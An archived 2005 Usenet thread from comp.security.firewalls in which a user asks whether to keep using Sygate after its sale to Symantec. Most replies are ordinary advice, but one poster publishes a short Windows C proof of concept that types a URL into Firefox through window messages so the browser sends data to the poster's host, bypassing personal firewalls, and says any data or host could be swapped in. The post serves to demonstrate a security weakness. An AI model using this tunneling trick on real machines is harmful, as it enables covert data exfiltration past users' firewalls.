Sign in with
Sign up | Sign in
Your question

Sygate ??

Last response: in Networking
Share
August 24, 2005 10:01:58 PM

Archived from groups: comp.security.firewalls (More info?)

Having just read that Sygate was purchased by Symantic, and I just
started using Sygate about a month ago, I'm wondering if I should be
looking for something else or continue to use Sygate.

Overall, I like Sygate but I'm still in the learning stages.

I realize no one can see the future, but are the upgraded versions
really that important. I mean Sygate is working now, but in six
months or a year would technology outpace it??
[Assuming no further upgrades are issued]

Many moon ago, I used Zonealarm but it seemed to get flaky after
awhile. Version 3 I think.
Was using Norton until it expired. Came with new Dell System.

Currently using:
XP Home
Sygate
AVGuard
Firefox
Agent
Both AOL & MSN messenger.

No other apps have access to net. If anything comes up and asks to
enter or leave computer I say no. So far nothing has barfed.

I've been reading this group and a virus group. Learned a lot, but
I'm no expert in computers. Just looking for any info about
situation.

Tom

More about : sygate

Anonymous
August 25, 2005 3:39:54 AM

Archived from groups: comp.security.firewalls (More info?)

i am a sygate die hard as well. symantec will probaly pull the plug on
the free version. but who knows?

you could go with new ZA. it's not bad and better rated than most similar
SFW's.

check this link for ratings and SFW options.

http://www.firewallleaktester.com/tests.htm

dg


TJ <DELETEthomasj1@arczip.com> wrote in
news:o 0tpg1hhfvdrbqeuuusqr7rdtpaee75q0q@4ax.com:

>
> Having just read that Sygate was purchased by Symantic, and I just
> started using Sygate about a month ago, I'm wondering if I should be
> looking for something else or continue to use Sygate.
>
> Overall, I like Sygate but I'm still in the learning stages.
>
> I realize no one can see the future, but are the upgraded versions
> really that important. I mean Sygate is working now, but in six
> months or a year would technology outpace it??
> [Assuming no further upgrades are issued]
>
> Many moon ago, I used Zonealarm but it seemed to get flaky after
> awhile. Version 3 I think.
> Was using Norton until it expired. Came with new Dell System.
>
> Currently using:
> XP Home
> Sygate
> AVGuard
> Firefox
> Agent
> Both AOL & MSN messenger.
>
> No other apps have access to net. If anything comes up and asks to
> enter or leave computer I say no. So far nothing has barfed.
>
> I've been reading this group and a virus group. Learned a lot, but
> I'm no expert in computers. Just looking for any info about
> situation.
>
> Tom
>



--
I am Against-TCPA
http://www.againsttcpa.com/
Anonymous
August 25, 2005 8:15:05 AM

Archived from groups: comp.security.firewalls (More info?)

I'm sticking with Sygate the free version for the next few months. Can't
predict what I'll do after that.

Since you just started using it, remember to go to 'applications' and on each
permitted app click on 'advanced' and set 'act as server' to No unless you
specifically need it to serve. It's the one weakness of Sygate, a mistaken
default setting. No big. Nex
Related resources
Anonymous
August 25, 2005 12:15:27 PM

Archived from groups: comp.security.firewalls (More info?)

TJ <DELETEthomasj1@arczip.com> wrote:
> No other apps have access to net. If anything comes up and asks to
> enter or leave computer I say no. So far nothing has barfed.

You're fooled by your "Personal Firewall". Just open Firefox, and
try out my proof of concept here:

http://www.dingens.org/breakout-mozilla-firefox.c

Your "Personal Firewall" will not even detect that. Just use the
Windows-Firewall, it's enough.

Yours,
VB.
--
"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
deutschen Schlafzimmern passiert".
Harald Schmidt zum "Weltjugendtag"
Anonymous
August 25, 2005 12:15:28 PM

Archived from groups: comp.security.firewalls (More info?)

On 25 Aug 2005 08:15:27 +0200, Volker Birk <bumens@dingens.org> wrote:

>TJ <DELETEthomasj1@arczip.com> wrote:
>> No other apps have access to net. If anything comes up and asks to
>> enter or leave computer I say no. So far nothing has barfed.
>
>You're fooled by your "Personal Firewall". Just open Firefox, and
>try out my proof of concept here:
>
>http://www.dingens.org/breakout-mozilla-firefox.c
>
>Your "Personal Firewall" will not even detect that. Just use the
>Windows-Firewall, it's enough.
>
>Yours,
>VB.

What is it suppose to do? The download manager came up and asked to
open or save c from www.dingens.org.
The file contained *phoneHome = "http://www.dingens.org/breakout.html"
and other stuff.
--

Dave
Central Mass. USA

To email: Replace
mailinator.com with email.com
Anonymous
August 25, 2005 9:30:50 PM

Archived from groups: comp.security.firewalls (More info?)

In article <o0tpg1hhfvdrbqeuuusqr7rdtpaee75q0q@4ax.com>,
DELETEthomasj1@arczip.com says...
>
> Having just read that Sygate was purchased by Symantic, and I just
> started using Sygate about a month ago, I'm wondering if I should be
> looking for something else or continue to use Sygate.
>
> Overall, I like Sygate but I'm still in the learning stages.
>
> I realize no one can see the future, but are the upgraded versions
> really that important. I mean Sygate is working now, but in six
> months or a year would technology outpace it??
> [Assuming no further upgrades are issued]
>
> Many moon ago, I used Zonealarm but it seemed to get flaky after
> awhile. Version 3 I think.
> Was using Norton until it expired. Came with new Dell System.
>
> Currently using:
> XP Home
> Sygate
> AVGuard
> Firefox
> Agent
> Both AOL & MSN messenger.
>
> No other apps have access to net. If anything comes up and asks to
> enter or leave computer I say no. So far nothing has barfed.
>
> I've been reading this group and a virus group. Learned a lot, but
> I'm no expert in computers. Just looking for any info about
> situation.
>
> Tom
>
Hi Tom. Guess I am one of the diehards who will keep using Sygate
for as long as possible. It has served me well for 4-yrs and without
causing any problems. When I heard the bad news last week, I began
having the same concerns as you. I see it this way:
1) Our installed Sygate contains all of the basic firewall requirements.
i.e. control of applications, IPs, ports, and protocols. About the only
thing overlooked is local host control 127.0.0.1. Sygate was going to
fix that but I guess they won't get to it :-(.
2) One big concern is the probable loss of signature updates. You didn't
say if you have the free or pro version. Only the pro has Intruder
Detection
System (IDS) and the intrusion signature updates. Compare them at:
http://smb.sygate.com/products/spf/comparison_spf.htm
I prowled around looking at the files in my Sygate pro and found
trojan.dat. Looks like that is where the downloaded signatures go.
I contains a listing of hundreds of trojan applications. If you
continue to use Sygate pro you might want to make a backup of
file trojan.dat. You could supplement the use of the retained
data with a good hosts file:
http://www.mvps.org/winhelp2002/hosts.txt
Good luck in making a choice.
Casey
August 25, 2005 9:41:45 PM

Archived from groups: comp.security.firewalls (More info?)

On Thu, 25 Aug 2005 04:15:05 +0000 (UTC), Alan Pollock
<nex@nopanix.com> wrote:

>I'm sticking with Sygate the free version for the next few months. Can't
>predict what I'll do after that.
>
>Since you just started using it, remember to go to 'applications' and on each
>permitted app click on 'advanced' and set 'act as server' to No unless you
>specifically need it to serve. It's the one weakness of Sygate, a mistaken
>default setting. No big. Nex

Ahaa! Thanks for tip!

Tom
August 25, 2005 9:47:59 PM

Archived from groups: comp.security.firewalls (More info?)

On 25 Aug 2005 08:15:27 +0200, Volker Birk <bumens@dingens.org> wrote:

>TJ <DELETEthomasj1@arczip.com> wrote:
>> No other apps have access to net. If anything comes up and asks to
>> enter or leave computer I say no. So far nothing has barfed.
>
>You're fooled by your "Personal Firewall". Just open Firefox, and
>try out my proof of concept here:
>
>http://www.dingens.org/breakout-mozilla-firefox.c
>
>Your "Personal Firewall" will not even detect that. Just use the
>Windows-Firewall, it's enough.
>
>Yours,
>VB.

Sorry, I ain't downLoading anything from unknown source.
Trust MS firewall?? Don't think so.

Tom
August 25, 2005 10:14:30 PM

Archived from groups: comp.security.firewalls (More info?)

On Thu, 25 Aug 2005 17:30:50 GMT, Casey Klc <casey@notspecified.net>
wrote:

[snipped]
>
>Hi Tom. Guess I am one of the diehards who will keep using Sygate
>for as long as possible. It has served me well for 4-yrs and without
>causing any problems. When I heard the bad news last week, I began
>having the same concerns as you. I see it this way:
>1) Our installed Sygate contains all of the basic firewall requirements.
>i.e. control of applications, IPs, ports, and protocols. About the only
>thing overlooked is local host control 127.0.0.1. Sygate was going to
>fix that but I guess they won't get to it :-(.
>2) One big concern is the probable loss of signature updates. You didn't
>say if you have the free or pro version. Only the pro has Intruder
>Detection
>System (IDS) and the intrusion signature updates. Compare them at:
>http://smb.sygate.com/products/spf/comparison_spf.htm
>I prowled around looking at the files in my Sygate pro and found
>trojan.dat. Looks like that is where the downloaded signatures go.
>I contains a listing of hundreds of trojan applications. If you
>continue to use Sygate pro you might want to make a backup of
>file trojan.dat. You could supplement the use of the retained
>data with a good hosts file:
>http://www.mvps.org/winhelp2002/hosts.txt
>Good luck in making a choice.
>Casey

Hi Casey,

I'm using the free version.

I've d/led Kerio and still looking through manual.
I still have to see about a ZA manual.
These seem to be the most popular PFW's.
The problem I have [And other neophyte users no doubt] is translating
the manual to english.

Thanks for tips.

Tom
Anonymous
August 26, 2005 3:46:30 PM

Archived from groups: comp.security.firewalls (More info?)

Dave McAuliffe <DaveMcA@mailinator.com> wrote:
> >> No other apps have access to net. If anything comes up and asks to
> >> enter or leave computer I say no. So far nothing has barfed.
> >You're fooled by your "Personal Firewall". Just open Firefox, and
> >try out my proof of concept here:
> >http://www.dingens.org/breakout-mozilla-firefox.c
> >Your "Personal Firewall" will not even detect that. Just use the
> >Windows-Firewall, it's enough.
> What is it suppose to do? The download manager came up and asked to
> open or save c from www.dingens.org.
> The file contained *phoneHome = "http://www.dingens.org/breakout.html"
> and other stuff.

Yes, of course. This is a proof of concept (POC) code sample to show,
how easy it is to trick "Personal Firewalls". It's written in the
programming language "C", so this is the reason, why it's a .c file.

You can compile it to an executable and try it out with Microsoft's MSVC
or i.e. with MingGW.

It sends this information outside: "breakout.html". This is done by
using your webbrowser to send this information, because usually
"Personal Firewall" users allow their webbrowser to communicate -
or they cannot use the WWW any more.

Of course, you can send other things than "breakout.html", anything
else also works, and you can send elsewhere than to www.dingens.org,
because it's just my machine ;-)

I wrote this piece of code, because we had such discussions also in
de.comp.security.misc and de.comp.security.firewall, the German sister
groups.

Some people claimed, that "Personal Firewalls" are secure, and that
we just had no idea, how a real "Personal Firewall" works.

So I was hacking those few lines of code without ever seen a "Personal
Firewall" before. Ansgar Wiechers made a test with the most common
"Personal Firewalls" (Kerio, Norman, Outpost, Sygate, Tiny, ZoneAlarm,
Symantec Norton), and they all failed already with such an easy trick.

You should notice: this is only the easiest trick I'm aware of. There
are many, many other possibilities, too, to tunnel.

So we have the proof, that a "Personal Firewall" only can control
these applications, which allow to be controlled This means, they're
useless, because a packet filter you're getting with the Windows-Firwall
also for free.

Yours,
VB.
--
"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
deutschen Schlafzimmern passiert".
Harald Schmidt zum "Weltjugendtag"
Anonymous
August 26, 2005 3:49:17 PM

Archived from groups: comp.security.firewalls (More info?)

TJ <DELETEthomasj1@arczip.com> wrote:
> >Your "Personal Firewall" will not even detect that. Just use the
> >Windows-Firewall, it's enough.
> Sorry, I ain't downLoading anything from unknown source.

No prolem, here is the content of this file:

#include <windows.h>

const char *phoneHome = "http://www.dingens.org/breakout.html";

int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine,
int nCmdShow)
{
HWND browser = FindWindowEx(NULL, NULL, "MozillaWindowClass", NULL);
HWND wnd = FindWindowEx(browser, NULL, "MozillaWindowClass", NULL);
int i;

SetForegroundWindow(wnd);

PostMessage(wnd, WM_CHAR, (WPARAM) 9, 0);

for (i=0; i<strlen(phoneHome); i++)
PostMessage(wnd, WM_CHAR, (WPARAM) phoneHome, NULL);

PostMessage(wnd, WM_KEYDOWN, (WPARAM) VK_RETURN, NULL);

return 0;
}

> Trust MS firewall?? Don't think so.

I you don't trust in Microsoft Software, then I think, you're not
using Windows.

The Windows-Firewall is a small and easy packet filter, which is
implemented feasible.

Yours,
VB.
--
"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
deutschen Schlafzimmern passiert".
Harald Schmidt zum "Weltjugendtag"
August 26, 2005 8:55:24 PM

Archived from groups: comp.security.firewalls (More info?)

On 26 Aug 2005 11:49:17 +0200, Volker Birk <bumens@dingens.org> wrote:

>TJ <DELETEthomasj1@arczip.com> wrote:
>> >Your "Personal Firewall" will not even detect that. Just use the
>> >Windows-Firewall, it's enough.
>> Sorry, I ain't downLoading anything from unknown source.
>
>No prolem, here is the content of this file:
>
>#include <windows.h>
>
>const char *phoneHome = "http://www.dingens.org/breakout.html";
>
>int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine,
> int nCmdShow)
>{
> HWND browser = FindWindowEx(NULL, NULL, "MozillaWindowClass", NULL);
> HWND wnd = FindWindowEx(browser, NULL, "MozillaWindowClass", NULL);
> int i;
>
> SetForegroundWindow(wnd);
>
> PostMessage(wnd, WM_CHAR, (WPARAM) 9, 0);
>
> for (i=0; i<strlen(phoneHome); i++)
> PostMessage(wnd, WM_CHAR, (WPARAM) phoneHome, NULL);
>
> PostMessage(wnd, WM_KEYDOWN, (WPARAM) VK_RETURN, NULL);
>
> return 0;
>}
>
>> Trust MS firewall?? Don't think so.
>
>I you don't trust in Microsoft Software, then I think, you're not
>using Windows.
>
>The Windows-Firewall is a small and easy packet filter, which is
>implemented feasible.
>
>Yours,
>VB.


I read your reply to Dave and this one, but this is way,
waaaaaaaaaaaay over my head.

And yes, I use Windows. There is little choice in today's market.
But I try to avoid MS applications and/or addons.

Thanks for reply but like I said, I have no idea what to do with info.

Tom

To be young again, when the brain is a sponge, soaking up knowledge.
Instead of old, when brain is a sieve.
Anonymous
August 27, 2005 12:42:14 PM

Archived from groups: comp.security.firewalls (More info?)

TJ <DELETEthomasj1@arczip.com> wrote:
> Thanks for reply but like I said, I have no idea what to do with info.

OK, I have to explain:

If you're using Microsoft Windows, then you have to trust Microsoft.

Why?

Microsoft Windows is the operating system. The operating system contains
the program - the kernel - which has the job to control all other programs
on your system. If you're not trusting in this program (the Windows kernel),
then you cannot trust the complete system. It does not matter, if you add
some extra software or not for this point.

BTW: the Windows kernel is not too bad. Until a limit I'd trust it. And
Microsoft is not the "evil empire" or something, Bill does not run
around with a black mantle, and I guess, he hasn't such heavy
problems with his breathing ;-) There are much better arguments for
free software than "no Microsoft".

OK so far? Well, next...

Tunneling cannot prohibited without loosing connection. Why this is true,
I explained some postings ago. Please read them, thank you ;-)

All what to do to ignore the control of a "Personal Firewall" for
"outbound connections" is to use some tunneling. This was clear, before
I saw my very first "Personal Firewall" (I in fact never used one, but
in the meanwhile, I saw Ansgar Wiechers testing some, and what I saw,
was a terribly incompetent accumulation of software garbage, I was
scared - I did not realize before, how sad those products are).

So I reflected, what would just be the easiest way for me to implement
tunneling, with what I'd have fewest work ;-) I decided to use tunneling
through Windows messages and HTTP with the web-browser the user uses.
This had an extra advantage - the browser usually is an exception, and
is not castrated by the "Personal Firewall" on every box, I thought,
because otherwise there would be no way for the user left to use webpages.
So perhaps using the browser was easiest.

I wrote a proof of concept, a POC code - this is what you find on
http://www.dingens.org/breakout.c - and I wrote it for Internet Explorer,
because most of the people who came to de.comp.security.* (where I'm
reading/writing) and are using "Personal Firewalls", also are using
this browser.

Other people tryed it out with their "Personal Firewalls", and it ignored
any "Personal Firewall", as expected.

Then the first thing I heard was "but this is only with Internet Explorer,
because this browser is so insecure". So I wrote a POC for a second
browser, too, Mozilla Firefox, to show that this is not a browser problem.
You can find this code on
http://www.dingens.org/breakout-mozilla-firefox.c

Meanwhile, Ansgar Wiechers has tested this and many other attacks against
many "Personal Firewalls", and none of them managed to prohibit communi-
cation to the outside.

This is not surprising, if you know, that you cannot prohibit tunneling
at all, it's just technically impossible, it's even theoretically
impossible.

The result of this thinking is: you only can control software, which is
already running on your PC, which is of good nature and wants to be
controlled, or which is malware and very dumb and incompetent itself.

This does not sound like "secure" to me.

Yours,
VB.
--
"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
deutschen Schlafzimmern passiert".
Harald Schmidt zum "Weltjugendtag"
Anonymous
August 28, 2005 2:27:40 PM

Archived from groups: comp.security.firewalls (More info?)

begin quotation
from Volker Birk <bumens@dingens.org>
in message <43100b46@news.uni-ulm.de>
posted at 2005-08-27T06:42
> TJ <DELETEthomasj1@arczip.com> wrote:
>> Thanks for reply but like I said, I have no idea what to do with
>> info.

> OK, I have to explain:

> If you're using Microsoft Windows, then you have to trust Microsoft.

> Why?

> Microsoft Windows is the operating system. The operating system
> contains the program - the kernel - which has the job to control all
> other programs on your system. If you're not trusting in this program
> (the Windows kernel), then you cannot trust the complete system. It
> does not matter, if you add some extra software or not for this point.

Agreed, though it should be noted Windows has much more than the kernel.
This is, in fact, the same argument that has to be made against
binary-only drivers in the Linux kernel.

> BTW: the Windows kernel is not too bad. Until a limit I'd trust it.
> And Microsoft is not the "evil empire" or something, Bill does not
> run around with a black mantle, and I guess, he hasn't such heavy
> problems with his breathing ;-) There are much better arguments for
> free software than "no Microsoft".

For the most part, I agree here. However, I personally feel that I
cannot trust Microsoft, having personally used five consecutive versions
of Windows, all of which did not perform as advertised in one form or
another. In addition, Microsoft's security track record is just plain
atrocious. Granted, for a while Red Hat wasn't doing a whole lot better,
and other GNU/Linux distributions have had rather large gaffes as well.
But the cold hard fact is, before Windows was Internet capable, there
was *the* Internet worm, as in one. Remember that.

Another problem, not necessarily Microsoft's fault but a large part of
it, has to do with the rest of the shrinkwrapped binary-only software
industry which they have more or less legitimized. Usually this means
getting new software means opening up your wallet and releasing anywhere
from $20 to $1,000 or more, or playing Russian roulette with
unauthorized copies. I have the desire to do neither, and at the same
time bring other players to the game which I may not trust any more than
Microsoft.

> The result of this thinking is: you only can control software, which
> is already running on your PC, which is of good nature and wants to be
> controlled, or which is malware and very dumb and incompetent itself.

And that which you can't control, you can always kill, right?

--
___ _ _____ |*|
/ __| |/ / _ \ |*| Shawn K. Quinn
\__ \ ' < (_) | |*| skquinn@speakeasy.net
|___/_|\_\__\_\ |*| Houston, TX, USA
Anonymous
August 28, 2005 11:32:24 PM

Archived from groups: comp.security.firewalls (More info?)

Shawn K. Quinn <skquinn@speakeasy.net> wrote:
> For the most part, I agree here. However, I personally feel that I
> cannot trust Microsoft, having personally used five consecutive versions
> of Windows, all of which did not perform as advertised in one form or
> another. In addition, Microsoft's security track record is just plain
> atrocious. Granted, for a while Red Hat wasn't doing a whole lot better,
> and other GNU/Linux distributions have had rather large gaffes as well.
> But the cold hard fact is, before Windows was Internet capable, there
> was *the* Internet worm, as in one. Remember that.

I know. I don't think, Microsoft Windows is a highly secure platform
or something. They're getting better with this SP2 stuff for Windows XP
now, but there is much work left to do. And Windows just is to complex
to become a higly secure system ever, I think.

But: if one doesn't trust into Microsoft, then she/he just shouldn't use
Windows. That was what I was trying to say.

> > The result of this thinking is: you only can control software, which
> > is already running on your PC, which is of good nature and wants to be
> > controlled, or which is malware and very dumb and incompetent itself.
> And that which you can't control, you can always kill, right?

Unfortunately, this is not true for every malware. You just can protect
your PC and keep your eyes open and your brain clear, so you will not
get malware running on your box.

Yours,
VB.
--
"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
deutschen Schlafzimmern passiert".
Harald Schmidt zum "Weltjugendtag"
!